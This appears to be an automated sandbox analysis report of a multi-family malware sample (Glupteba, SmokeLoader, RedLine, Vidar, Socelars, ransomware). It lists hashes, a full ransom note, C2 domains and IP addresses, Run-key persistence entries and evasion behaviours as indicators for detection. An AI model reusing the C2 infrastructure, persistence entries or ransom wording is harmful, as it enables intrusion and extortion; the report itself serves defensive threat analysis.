glupteba | 64dc2b5958fe37dd9733928c156e0c75ab544e2e0169f9f796c3f3db809bcbe5

Target

toolspab2 (23).exe
Size

315KB
MD5

585c257e0b345b762e7cdc407d8f9da2
SHA1

ffee403d97b76c3460fc166b9d5ce1205cd216a5
SHA256

4a0ecbcf9b54ed1c9654eb9ee214a797f48c980c6d03a261f62fa9671a2733d6
SHA512

14d39a6cd1c6d912cae7c35e2a98affcd5a9c1df6b947c42de65344e08d34912b09ccac83f9d8c3213b4e3d555769801e8218cb3f4b970d1d08606ee5a454ba8

Score

10^/10

glupteba metasploit redline smokeloader socelars vidar 1 517 backdoor discovery dropper evasion infostealer loader persistence ransomware spyware stealer trojan

Malware Config

Extracted

Path

C:\_readme.txt

Ransom Note

ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-mNr1oio2P6 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0315ewgfDdSgcyhrmIFKlwG8I3XxekHbYahiFXX0aowKJPQVTk

Emails

[email protected]

URLs

https://we.tl/t-mNr1oio2P6

Extracted

Family

smokeloader

Version

2020

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32

Extracted

Family

redline

Botnet

45.32.235.238:45555

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

82.202.161.37:26317

Extracted

Family

vidar

Version

39.4

Botnet

517

https://sergeevih43.tumblr.com/

Attributes

profile_id
517

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 2 IoCs

resource	yara_rule
behavioral31/memory/1384-206-0x0000000002AD0000-0x00000000033F6000-memory.dmp	family_glupteba
behavioral31/memory/1384-212-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 5 IoCs

resource	yara_rule
behavioral31/memory/984-81-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral31/memory/984-82-0x0000000000417E96-mapping.dmp	family_redline
behavioral31/memory/984-84-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral31/memory/1916-241-0x0000000001F30000-0x0000000001F4B000-memory.dmp	family_redline
behavioral31/memory/1916-242-0x0000000001F50000-0x0000000001F69000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 1 IoCs

resource	yara_rule
behavioral31/files/0x0006000000013186-215.dat	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Vidar Stealer 4 IoCs

stealer

resource	yara_rule
behavioral31/memory/2172-269-0x0000000001D50000-0x0000000001DEE000-memory.dmp	family_vidar
behavioral31/memory/2428-268-0x000000000046B76D-mapping.dmp	family_vidar
behavioral31/memory/2428-267-0x0000000000400000-0x00000000004A1000-memory.dmp	family_vidar
behavioral31/memory/2428-271-0x0000000000400000-0x00000000004A1000-memory.dmp	family_vidar

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	134 Vaporeondè_éçè_)))_.exe

Executes dropped EXE 55 IoCs

pid	Process
760	C033.exe
432	C7E2.exe
1120	733F.exe
984	733F.exe
540	8E3E.exe
1480	9216.exe
1332	A01B.exe
1736	A8F2.exe
340	487C.exe
932	4A03.exe
1360	U1PwSASbnJZ1Nt2.eXE
928	4EE4.exe
1940	4EE4.tmp
1384	487C.exe
240	487C.exe
1100	134 Vaporeondè_éçè_)))_.exe
1744	7F87.exe
1620	487C.exe
1112	5D47.exe
1916	9144.exe
1384	487C.exe
2172	build2.exe
2232	irecord.exe
2260	Gumafaezhucae.exe
2292	Takushulaga.exe
2428	build2.exe
2636	duebvca
2656	irebvca
760	irebvca
2216	irecord.tmp
2192	I-Record.exe
1476	toolspab1.exe
984	toolspab1.exe
2644	487C.exe
2224	487C.exe
2776	487C.exe
2936	487C.exe
1072	5F2E.exe
2900	5F2E.exe
1996	duebvca
2276	irebvca
2336	irebvca
2508	487C.exe
2516	487C.exe
960	487C.exe
2704	487C.exe
2608	duebvca
2640	irebvca
2132	irebvca
1088	487C.exe
3020	487C.exe
2276	E32D.exe
2172	E485.exe
840	0~NM~WIL.eXe
812	E725.exe

Modifies extensions of user files 8 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\GroupClose.raw => C:\Users\Admin\Pictures\GroupClose.raw.wwka	487C.exe
File renamed	C:\Users\Admin\Pictures\InstallLimit.raw => C:\Users\Admin\Pictures\InstallLimit.raw.wwka	487C.exe
File renamed	C:\Users\Admin\Pictures\MeasureUpdate.tif => C:\Users\Admin\Pictures\MeasureUpdate.tif.wwka	487C.exe
File renamed	C:\Users\Admin\Pictures\MergeInitialize.tif => C:\Users\Admin\Pictures\MergeInitialize.tif.wwka	487C.exe
File renamed	C:\Users\Admin\Pictures\MountTrace.crw => C:\Users\Admin\Pictures\MountTrace.crw.wwka	487C.exe
File opened for modification	C:\Users\Admin\Pictures\PushProtect.tiff	487C.exe
File renamed	C:\Users\Admin\Pictures\PushProtect.tiff => C:\Users\Admin\Pictures\PushProtect.tiff.wwka	487C.exe
File renamed	C:\Users\Admin\Pictures\UnprotectConvert.png => C:\Users\Admin\Pictures\UnprotectConvert.png.wwka	487C.exe

Deletes itself 1 IoCs

pid	Process
1240	Process not Found

Loads dropped DLL 44 IoCs

pid	Process
1368	toolspab2 (23).exe
1120	733F.exe
1736	A8F2.exe
1836	cmd.exe
928	4EE4.exe
1940	4EE4.tmp
1940	4EE4.tmp
1940	4EE4.tmp
1832	regsvr32.exe
340	487C.exe
1940	4EE4.tmp
240	487C.exe
240	487C.exe
1620	487C.exe
1384	487C.exe
1384	487C.exe
2428	build2.exe
2428	build2.exe
2428	build2.exe
2428	build2.exe
760	irebvca
2636	duebvca
2232	irecord.exe
2216	irecord.tmp
2216	irecord.tmp
2216	irecord.tmp
2216	irecord.tmp
2216	irecord.tmp
2192	I-Record.exe
2192	I-Record.exe
2192	I-Record.exe
2192	I-Record.exe
2192	I-Record.exe
2192	I-Record.exe
2192	I-Record.exe
1476	toolspab1.exe
984	toolspab1.exe
1072	5F2E.exe
2336	irebvca
1996	duebvca
2608	duebvca
2132	irebvca
2944	cmd.exe
2536	regsvr32.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1636	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\669482dc-ed7b-46a8-a0ff-4122fbdb0502\\487C.exe\" --AutoStart"	487C.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Sozhucaevysho.exe\""	134 Vaporeondè_éçè_)))_.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 9 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
458	api.2ip.ua
489	api.2ip.ua
705	api.2ip.ua
121	api.2ip.ua
229	api.2ip.ua
228	api.2ip.ua
422	api.2ip.ua
120	api.2ip.ua
144	api.2ip.ua

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
1832	regsvr32.exe
2536	regsvr32.exe

Suspicious use of SetThreadContext 15 IoCs

description	pid	Process	procid_target
PID 1108 set thread context of 1368	1108	toolspab2 (23).exe	29
PID 1120 set thread context of 984	1120	733F.exe	34
PID 340 set thread context of 240	340	487C.exe	71
PID 1620 set thread context of 1384	1620	487C.exe	80
PID 2172 set thread context of 2428	2172	build2.exe	89
PID 2656 set thread context of 760	2656	irebvca	106
PID 1476 set thread context of 984	1476	toolspab1.exe	114
PID 2644 set thread context of 2224	2644	487C.exe	117
PID 2776 set thread context of 2936	2776	487C.exe	126
PID 1072 set thread context of 2900	1072	5F2E.exe	131
PID 2276 set thread context of 2336	2276	irebvca	134
PID 2508 set thread context of 2516	2508	487C.exe	139
PID 960 set thread context of 2704	960	487C.exe	143
PID 2640 set thread context of 2132	2640	irebvca	150
PID 1088 set thread context of 3020	1088	487C.exe	157

Drops file in Program Files directory 30 IoCs

description	ioc	Process
File created	C:\Program Files\DVD Maker\MTDXTLSWGV\irecord.exe	134 Vaporeondè_éçè_)))_.exe
File opened for modification	C:\Program Files (x86)\i-record\AForge.Video.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\swresample-0.dll	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-VVLFF.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\avformat-53.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\avdevice-53.dll	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-HM1M5.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-U9VHL.tmp	irecord.tmp
File created	C:\Program Files\DVD Maker\MTDXTLSWGV\irecord.exe.config	134 Vaporeondè_éçè_)))_.exe
File opened for modification	C:\Program Files (x86)\i-record\swscale-2.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\AForge.Video.FFMPEG.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\postproc-52.dll	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-180QR.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-D565L.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\unins000.dat	irecord.tmp
File created	C:\Program Files (x86)\Windows Mail\Sozhucaevysho.exe	134 Vaporeondè_éçè_)))_.exe
File created	C:\Program Files (x86)\Windows Mail\Sozhucaevysho.exe.config	134 Vaporeondè_éçè_)))_.exe
File opened for modification	C:\Program Files (x86)\i-record\avutil-51.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\I-Record.exe	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-C94EN.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-DI51L.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\avcodec-53.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\avfilter-2.dll	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-UQT1V.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-A2B7H.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-3RORM.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-0VQAQ.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-H344I.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\unins000.dat	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-LMTSE.tmp	irecord.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 27 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	irebvca
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	irebvca
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	irebvca
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	duebvca
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	duebvca
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	duebvca
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab2 (23).exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	A8F2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	irebvca
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab2 (23).exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	A8F2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	duebvca
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	duebvca
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	duebvca
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	irebvca
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	irebvca
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	duebvca
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	duebvca
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	irebvca
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	irebvca
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab2 (23).exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	A8F2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	duebvca
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	irebvca

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build2.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2948	timeout.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
2368	taskkill.exe
1364	taskkill.exe
2104	taskkill.exe
2904	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "148713"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "148986"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\offer.alibaba.com\ = "135"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\is.alicdn.com\ = "24"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "148361"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "148622"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\alibaba.com\Total = "148868"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\alicdn.com	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "148894"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "149000"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "148298"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "135"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "194"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\alibaba.com\Total = "148454"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "148943"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007b71919f92d7614aaa67173cee7dea6900000000020000000000106600000001000020000000f10ad7645bac64de62969ae8fbd2f9549b20263659d8eee7ef97f68755d8a7bb000000000e80000000020000200000003f12d7e97d2cbcd0e2eeacdacc59f9ca6d6c0b8061ce698cff0783ac3f3fcec5200000000ab8f24f9c277c1d1066939a56d7f7e973356523183e7f4b03b31086047b3745400000007e865310077e52be26410877b3025aa5613ed44d793de925b63e07448cfa33a1b46baf2798898dc254c2ca878cf8e830d389306e591da9811a85721d884b6c05	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "14"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\alibaba.com\Total = "135"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\offer.alibaba.com\ = "148284"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "148522"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\offer.alibaba.com\ = "148925"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\alibaba.com\Total = "66"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "148254"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\alibaba.com\Total = "148284"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "54"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\i.alicdn.com\ = "24"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\alibaba.com\Total = "148522"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\alibaba.com\Total = "148738"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "149"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "332604781"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\offer.alibaba.com\ = "148713"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\i.alicdn.com	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\alibaba.com\Total = "148713"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\alibaba.com\Total = "14"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\alicdn.com\Total = "75"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\offer.alibaba.com\ = "148849"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\offer.alibaba.com\ = "14"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "148284"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\offer.alibaba.com\ = "148738"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\offer.alibaba.com\ = "148819"	IEXPLORE.EXE

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	5D47.exe
